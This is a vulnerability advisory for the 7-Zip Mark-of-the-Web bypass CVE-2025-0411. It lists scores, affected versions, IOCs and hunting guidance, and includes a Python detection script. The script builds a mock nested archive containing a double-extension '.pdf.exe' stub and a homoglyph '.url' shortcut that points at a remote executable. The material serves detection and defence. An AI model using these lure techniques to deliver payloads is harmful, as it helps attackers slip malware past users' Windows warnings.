CVE-2025-0411
published 2025-01-25

CVE-2025-0411: 7-Zip Mark-of-the-Web Bypass Vulnerability

Priority: P1 (81, high)
CVSS 3.1: 7.0, AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2025-02-27
Exploited in the wild
EPSS: 67.07% (99.2th percentile)
7-Zip Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archived files. When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web to the extracted files. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current user. Was ZDI-CAN-25456.

Affected

5 ranges

Vendor   Product   Version range                  Fixed in
7-zip    7-zip     < 24.09                        24.09
7-zip    7-zip     (no range given)
7-zip    p7zip     >= 0 < 16.02+transitional.1    16.02+transitional.1
debian   7zip      (no range given)
debian   p7zip     (no range given)

Note: the Mark-of-the-Web is a Windows NTFS alternate data stream, so on Linux builds (p7zip, Debian's 7zip) there is no zone to propagate; the Debian entries track the upstream code change rather than an exploitable condition, which matches Debian's LOW rating in the provenance table below.

Detection & IOCs (extracted from sources)

hash (SHA-256): ba74ecae43adc78efaee227a0d7170829b9036e5e7f602cf38f32715efa51826
filename: Платежное Поручение в iнозеной валюте та сопроводiтельни документи вiд 23.09.2024p.url (translation: "Payment order in foreign currency and accompanying documents dated 23.09.2024.url")
filename: Платежное Поручение в iнозеной валюте.pdf.exe (translation: "Payment order in foreign currency.pdf.exe")
path: poc.outer.zip\poc.inner.zip
bytes: \x37\x7A\xBC\xAF\x27\x1C (the 7z archive signature: "7z" followed by BC AF 27 1C)
  • Detect the MoTW bypass via double-nested archives: flag files extracted from an archive-within-an-archive (e.g. outer.zip\inner.zip\payload) that lack a Zone.Identifier alternate data stream with ZoneId=3, especially when the outer archive itself carries MoTW.
  • Hunt for executables or scripts written without a Zone.Identifier ADS that came out of a double-encapsulated archive extracted by a 7-Zip version earlier than 24.09.
  • Detect homoglyph-based filename spoofing: look for filenames (or domains) that mix Cyrillic letters (e.g. Cyrillic 'es', U+0441) with Latin letters, particularly in archive contents or email attachments, to catch extension-spoofing attempts.
  • Flag .url files carrying a spoofed ZIP-archive icon that were extracted from nested 7-Zip archives as high risk; the reported campaign used them to get users to launch SmokeLoader payloads without a MoTW warning.
  • Treat double-extension executables (e.g. .pdf.exe) dropped from nested archives as an indicator of CVE-2025-0411 exploitation delivering SmokeLoader.
  • The bypass works regardless of the archive format used for the outer or inner archive; it is not limited to .zip or .7z containers.
  • Because the MoTW is never propagated, downstream Windows controls that key on it (SmartScreen reputation and signature checks, Office Protected View and its macro blocking) do not trigger on the extracted payloads.
  • Caveat for the ADS checks above: Zone.Identifier is an NTFS alternate data stream, so files extracted onto FAT/exFAT volumes never carry one, and 7-Zip only writes it when its zone-propagation option is enabled; a missing stream is evidence only where both conditions hold.
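The detection notes above can be turned into a small triage script. The following is an added example written for this page, not code from 7-Zip, ZDI or any of the page's sources. It walks a nested archive the way the bypass is triggered (outer container, inner container, payload), flags every member at nesting depth 1 or deeper as something a 7-Zip release before 24.09 would have written without MoTW, applies the lure-name heuristics (double extension, .url launcher, Cyrillic/Latin mixed-script tokens), recognises the 7z magic bytes from the IOC list, and includes a Zone.Identifier reader for use on a Windows extraction directory. The sample archive, the filenames inside it, the URL and the extension lists are all constructed for the example; only zip containers are descended, since the standard library has no 7z reader, so a nested 7z is reported rather than opened.

```python
"""Hunt helpers for the nested-archive MoTW failure described above.
Added example for this page, not code from 7-Zip, ZDI or the page's sources;
the archive, filenames and Zone.Identifier text are all constructed."""
import io
import os
import re
import unicodedata
import zipfile

# Container magic; the 7z sequence is the IOC byte string listed above.
ARCHIVE_MAGIC = {b"\x37\x7A\xBC\xAF\x27\x1C": "7z", b"PK\x03\x04": "zip"}
# Assumed extension lists; tune to the environment.
LAUNCHER_EXT = {".exe", ".scr", ".url", ".lnk", ".js", ".vbs", ".bat", ".cmd", ".hta"}
DECOY_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}

def sniff_archive(blob):
    """Return 'zip', '7z' or None from the leading bytes."""
    return next((fmt for magic, fmt in ARCHIVE_MAGIC.items() if blob.startswith(magic)), None)

def parse_zone_id(ads_text):
    """ZoneId from Zone.Identifier stream text (3 = Internet zone), or None."""
    m = re.search(r"^ZoneId=(\d+)\s*$", ads_text, re.MULTILINE)
    return int(m.group(1)) if m else None

def read_zone_id(path):
    """Read a file's Zone.Identifier ADS (NTFS, Windows only); None when the
    stream is absent or the platform/volume has no ADS (Linux, FAT)."""
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as f:
            return parse_zone_id(f.read())
    except OSError:
        return None

def mixed_script_tokens(name):
    """Letter runs mixing Cyrillic and Latin, e.g. Latin 'i' inside a Cyrillic
    word or Cyrillic 'es' (U+0441) inside a Latin extension."""
    bad = []
    for token in re.findall(r"[^\W\d_]+", name):
        scripts = {unicodedata.name(ch, "?").split(" ")[0] for ch in token}
        if {"CYRILLIC", "LATIN"} <= scripts:
            bad.append(token)
    return bad

def filename_findings(name):
    """Lure-style name heuristics from the detection notes above."""
    base = os.path.basename(name.replace("\\", "/"))
    stem, ext = os.path.splitext(base.lower())
    findings = []
    if ext in LAUNCHER_EXT and os.path.splitext(stem)[1] in DECOY_EXT:
        findings.append(f"double extension {os.path.splitext(stem)[1]}{ext}")
    if ext == ".url":
        findings.append(".url shortcut (icon can be spoofed)")
    findings += [f"mixed-script token {t!r}" for t in mixed_script_tokens(base)]
    return findings

def walk_zip(blob, depth=0, prefix=""):
    """Yield (path, depth, fmt, data) for leaf members, descending into nested
    zips. A nested 7z is reported, not opened (no third-party reader assumed)."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data, path = zf.read(info), prefix + info.filename
            if sniff_archive(data) == "zip":
                yield from walk_zip(data, depth + 1, path + "\\")
            else:
                yield path, depth, sniff_archive(data), data

def assess_archive(blob, outer_zone=3):
    """Flag what 7-Zip < 24.09 writes without MoTW: every member at depth >= 1
    when the outer archive carries ZoneId=3, plus the lure-style name patterns."""
    report = []
    for path, depth, fmt, data in walk_zip(blob):
        findings = filename_findings(path)
        if depth >= 1 and outer_zone == 3:
            findings.append("nested member: MoTW not propagated by 7-Zip < 24.09")
        if fmt == "7z":
            findings.append("nested 7z container (not descended)")
        if data[:2] == b"MZ":
            findings.append("PE image")
        report.append({"path": path, "depth": depth, "findings": findings})
    return report

def build_sample():
    """Constructed poc.outer.zip -> poc.inner.zip -> lures; not the real sample."""
    lure_exe = "Платежное поручение в iностранной валюте.pdf.exe"  # ASCII 'i' in a Cyrillic word
    lure_url = "invoi\u0441e.url"  # Cyrillic 'es' inside a Latin word
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(lure_exe, b"MZ" + b"\x00" * 62)
        zf.writestr(lure_url, "[InternetShortcut]\r\nURL=file://203.0.113.10/s/x.exe\r\n")
        zf.writestr("stage2.7z", b"\x37\x7A\xBC\xAF\x27\x1C" + b"\x00" * 26)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("poc.inner.zip", inner.getvalue())
        zf.writestr("readme.txt", b"decoy")
    return outer.getvalue()

if __name__ == "__main__":
    for row in assess_archive(build_sample()):
        print(row["depth"], row["path"], row["findings"])
```

Running the script prints four rows: the three inner members at depth 1 each carry the "nested member" finding, the .pdf.exe additionally gets the double-extension, mixed-script and PE findings, the .url gets the launcher and mixed-script findings, and readme.txt at depth 0 is clean. On a Windows host the second hunt from the list above is `read_zone_id(p) is None` over an `os.walk` of the extraction directory, subject to the NTFS and zone-propagation caveat; everywhere else `read_zone_id` simply returns None, which is why the archive-level checks do not depend on it.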

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      7.0     HIGH       CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
nvd             v3.0      7.0     HIGH       CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
osv                       7.0     HIGH
vulncheck                 7.0     HIGH
cisa                      7.0     HIGH
vendor_debian             7.0     LOW